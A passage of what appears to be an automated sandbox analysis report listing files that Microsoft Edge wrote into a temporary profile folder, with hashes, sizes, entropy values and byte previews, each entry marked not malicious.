                                                                                                              Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\HubApps Icons

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 2
                                                                                                              Category:dropped
                                                                                                              Size (bytes):28672
                                                                                                              Entropy (8bit):0.33890226319329847
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:TLMfly7aoxrRGcAkSQdC6ae1//fxEjkE/RFL2iFV1eHFxOUwa5qgufTsZ75fOSI:TLYcjr0+Pdajk+FZH1W6UwccI5fBI
                                                                                                              MD5:971F4C153D386AC7ED39363C31E854FC
                                                                                                              SHA1:339841CA0088C9EABDE4AACC8567D2289CCB9544
                                                                                                              SHA-256:B6468DA6EC0EAE580B251692CFE24620D39412954421BBFDECB13EF21BE7BC88
                                                                                                              SHA-512:1A4DD0C2BE163AAB3B81D63DEB4A7DB6421612A6CF1A5685951F86B7D5A40B67FC6585B7E52AA0CC20FF47349F15DFF0C9038086E3A7C78AE0FFBEE6D8AA7F7E
                                                                                                              Malicious:false
                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Local Storage\leveldb\000001.dbtmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Local Storage\leveldb\LOG

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):281
                                                                                                              Entropy (8bit):5.376271616567877
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:YUJXHM1e0i23fQX8a2jM8B2KLlapq2Pe0i23fQX8a2jMGIFUv:YUZHkZW8jFLQpvvZW8EFUv
                                                                                                              MD5:0E9F482B272F701F35B620A85A3F37FB
                                                                                                              SHA1:84630FA0F692B9E427D125965DA5A169C03D2505
                                                                                                              SHA-256:AB88545F61171C321A072B0EE3A872D3803BB93DDF33B5AF09C3FFE3A67BF25C
                                                                                                              SHA-512:193D1BDD36168632CDA4E2549F150F6CE964B31310CD3D2A9BE946A44728FF5120B7ADB0EABD3E47EC8D7529FFF3AA64675D56018F7933D5BF3389222236F1BA
                                                                                                              Malicious:false
                                                                                                              Preview:2024/12/05-04:39:43.168 1634 Creating DB C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Local Storage\leveldb since it was missing..2024/12/05-04:39:43.239 1634 Reusing MANIFEST C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Local Storage\leveldb/MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Local Storage\leveldb\MANIFEST-000001

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:OpenPGP Secret Key
                                                                                                              Category:dropped
                                                                                                              Size (bytes):41
                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                              Malicious:false
                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Login Data

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                              Category:dropped
                                                                                                              Size (bytes):51200
                                                                                                              Entropy (8bit):0.8746135976761988
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                              Malicious:false
                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Network\207cd8e9-0465-4806-a380-04d05d53df3b.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2
                                                                                                              Entropy (8bit):1.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:H:H
                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                              Malicious:false
                                                                                                              Preview:[]

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Network\6842e756-4502-4447-aa33-e2df5d971cfb.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):40
                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                              Malicious:false
                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Network\Cookies

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                              Category:dropped
                                                                                                              Size (bytes):20480
                                                                                                              Entropy (8bit):0.6732424250451717
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                              Malicious:false
                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Network\Reporting and NEL

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                              Category:modified
                                                                                                              Size (bytes):36864
                                                                                                              Entropy (8bit):0.5559635235158827
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:T6IopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:OIEumQv8m1ccnvS6
                                                                                                              MD5:9AAAE8C040B616D1378F3E0E17689A29
                                                                                                              SHA1:F91E7DE07F1DA14D15D067E1F50C3B84A328DBB7
                                                                                                              SHA-256:5B94D63C31AE795661F69B9D10E8BFD115584CD6FEF5FBB7AA483FDC6A66945B
                                                                                                              SHA-512:436202AB8B6BB0318A30946108E6722DFF781F462EE05980C14F57F347EDDCF8119E236C3290B580CEF6902E1B59FB4F546D6BD69F62479805B39AB0F3308EC1
                                                                                                              Malicious:false
                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Network\Trust Tokens

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):36864
                                                                                                              Entropy (8bit):0.36515621748816035
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                              MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                              SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                              SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                              SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                              Malicious:false
                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Network\f4084822-0bd2-4520-b923-acf390012d23.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2
                                                                                                              Entropy (8bit):1.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:H:H
                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                              Malicious:false
                                                                                                              Preview:[]

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Nurturing\campaign_history

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                              Category:dropped
                                                                                                              Size (bytes):20480
                                                                                                              Entropy (8bit):0.46731661083066856
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                              MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                              SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                              SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                              SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                              Malicious:false
                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\README

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):182
                                                                                                              Entropy (8bit):4.2629097520179995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:RGXKRjg0QwVIWRKXECSAV6jDyhjgHGAW+LB2Z4MKLFE1SwhiFAfXQmWyKBPMwRgK:z3frsUpAQQgHGwB26MK8Sw06fXQmWtRT
                                                                                                              MD5:643E00B0186AA80523F8A6BED550A925
                                                                                                              SHA1:EC4056125D6F1A8890FFE01BFFC973C2F6ABD115
                                                                                                              SHA-256:A0C9ABAE18599F0A65FC654AD36251F6330794BEA66B718A09D8B297F3E38E87
                                                                                                              SHA-512:D91A934EAF7D9D669B8AD4452234DE6B23D15237CB4D251F2C78C8339CEE7B4F9BA6B8597E35FE8C81B3D6F64AE707C68FF492903C0EDC3E4BAF2C6B747E247D
                                                                                                              Malicious:false
                                                                                                              Preview:Microsoft Edge settings and storage represent user-selected preferences and information and MUST not be extracted, overwritten or modified except through Microsoft Edge defined APIs.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Session Storage\000001.dbtmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Session Storage\000003.log

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):61
                                                                                                              Entropy (8bit):3.7273991737283296
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:S8ltHlS+QUl1ASEGhTFl:S85aEFl
                                                                                                              MD5:9F7EADC15E13D0608B4E4D590499AE2E
                                                                                                              SHA1:AFB27F5C20B117031328E12DD3111A7681FF8DB5
                                                                                                              SHA-256:5C3A5B578AB9FE853EAD7040BC161929EA4F6902073BA2B8BB84487622B98923
                                                                                                              SHA-512:88455784C705F565C70FA0A549C54E2492976E14643E9DD0A8E58C560D003914313DF483F096BD33EC718AEEC7667B8DE063A73627AA3436BA6E7E562E565B3F
                                                                                                              Malicious:false
                                                                                                              Preview:*...#................version.1..namespace-..&f...............

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Session Storage\LOG

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):269
                                                                                                              Entropy (8bit):5.286900698182733
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:Y4Vdp+q1e0i23fQXrQM72KLlaCuivIq2Pe0i23fQXrQMxIFUv:Y4Tp+6ZW/LQDDvvZWCFUv
                                                                                                              MD5:01E91A07825D9DCD9A63FA583476C215
                                                                                                              SHA1:D9AEB3E6951D070AEC6C9AD90B382BE7F11ECD3F
                                                                                                              SHA-256:F236E6C2B2FE70443C6196224735AAA6B1190ADA1D5A4FCBBC2BB1960491CB03
                                                                                                              SHA-512:CDDAE583E62ED513C0B45BBC7FBE0A4D9105C7C27D7746A1D1A5CA3D91EA0A9ABDC423EFA34A0ECD1A3C936FD359362D44547F0CC4D595D836695B2A3BB6DB0A
                                                                                                              Malicious:false
                                                                                                              Preview:2024/12/05-04:39:43.330 1740 Creating DB C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Session Storage since it was missing..2024/12/05-04:39:43.505 1740 Reusing MANIFEST C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Session Storage/MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Session Storage\MANIFEST-000001

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:OpenPGP Secret Key
                                                                                                              Category:dropped
                                                                                                              Size (bytes):41
                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                              Malicious:false
                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Site Characteristics Database\000001.dbtmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Site Characteristics Database\000003.log

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):40
                                                                                                              Entropy (8bit):3.473726825238924
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:41tt0diERGn:et084G
                                                                                                              MD5:148079685E25097536785F4536AF014B
                                                                                                              SHA1:C5FF5B1B69487A9DD4D244D11BBAFA91708C1A41
                                                                                                              SHA-256:F096BC366A931FBA656BDCD77B24AF15A5F29FC53281A727C79F82C608ECFAB8
                                                                                                              SHA-512:C2556034EA51ABFBC172EB62FF11F5AC45C317F84F39D4B9E3DDBD0190DA6EF7FA03FE63631B97AB806430442974A07F8E81B5F7DC52D9F2FCDC669ADCA8D91F
                                                                                                              Malicious:false
                                                                                                              Preview:.On.!................database_metadata.1

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Site Characteristics Database\LOG

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):297
                                                                                                              Entropy (8bit):5.247406007198513
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:YxYccHM1e0i23fQX7Uh2gr52KLlaxiBWjyq2Pe0i23fQX7Uh2ghZIFUv:Y6kZWIhHJLQw0jyvvZWIhHh2FUv
                                                                                                              MD5:B832470B0551EFACB085A78750B26D5B
                                                                                                              SHA1:A81A85CDF31A86A4F7056027FF33DBD7BD2C65CF
                                                                                                              SHA-256:F90ADEB131F5F8EE8C6A46117759A61F56C4750294A9DBC19FD80BA12B1E44B3
                                                                                                              SHA-512:2250C042C86254F18F664DDBCAA66F43CC4870CF8A73E1C978B9544650009E123CBABA3090AB3986BEDAC5B2233CF4CF42E950071A2406360BC39885C816CA15
                                                                                                              Malicious:false
                                                                                                              Preview:2024/12/05-04:39:42.549 1814 Creating DB C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Site Characteristics Database since it was missing..2024/12/05-04:39:42.705 1814 Reusing MANIFEST C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Site Characteristics Database/MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Site Characteristics Database\MANIFEST-000001

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:OpenPGP Secret Key
                                                                                                              Category:dropped
                                                                                                              Size (bytes):41
                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                              Malicious:false
                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):24
                                                                                                              Entropy (8bit):2.1431558784658327
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:m+l:m
                                                                                                              MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                              SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                              SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                              SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                              Malicious:false
                                                                                                              Preview:0\r..m..................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):24
                                                                                                              Entropy (8bit):2.1431558784658327
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:m+l:m
                                                                                                              MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                              SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                              SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                              SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                              Malicious:false
                                                                                                              Preview:0\r..m..................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\temp-index

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):48
                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Z1Tp0ESVBxi+:H1mi+
                                                                                                              MD5:8E964E0FC3A8B457ADF8FAF063881CF5
                                                                                                              SHA1:4CF9F19CF75C1912D1CB32A4880511CC4613832B
                                                                                                              SHA-256:B7ECC747C60F2CE4527A67DB29AB9C206214C75868155D447CAB3CB6C2E3049A
                                                                                                              SHA-512:860598125CADC2683D54839ADCFD452701B3225F5FAE7E205A7D270B9DF4221FAA0A2C946BA84712E33B44E6939BD04CEEC4E25279B6B85389139EE2B90FA01B
                                                                                                              Malicious:false
                                                                                                              Preview:(...D.9@oy retne..........................$.../.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):190
                                                                                                              Entropy (8bit):5.218028153474993
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:tRmB+u3CXFDFmXHM2bnF5OerbJSRE2J5xAIQnWmj/KKjqEKIZjNhm3K/2RKUDQT0:Y3CXaXHM1e0i23fQXzjqEKj3K/2jM8BL
                                                                                                              MD5:478A04D27C630D47BC458C1248DC1791
                                                                                                              SHA1:633F479ACB23339537FD8B035236760D633F7ABA
                                                                                                              SHA-256:B1176CE7AA07D8C650A848FE2C2FD5B9C28DD2A5CC0D7DDA594E17AF61DE8477
                                                                                                              SHA-512:9EF8A121E64B50459BB4AE5845ADAFFCBB85ACA98CBD1BCFC582BEA5DF35F78C397F966E51E5366275BD37FA63064AC7F4EFBE12A0F264AEADC2341A01E885CE
                                                                                                              Malicious:false
                                                                                                              Preview:2024/12/05-04:39:44.012 1634 Creating DB C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb since it was missing..

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Sync Data\LevelDB\000001.dbtmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
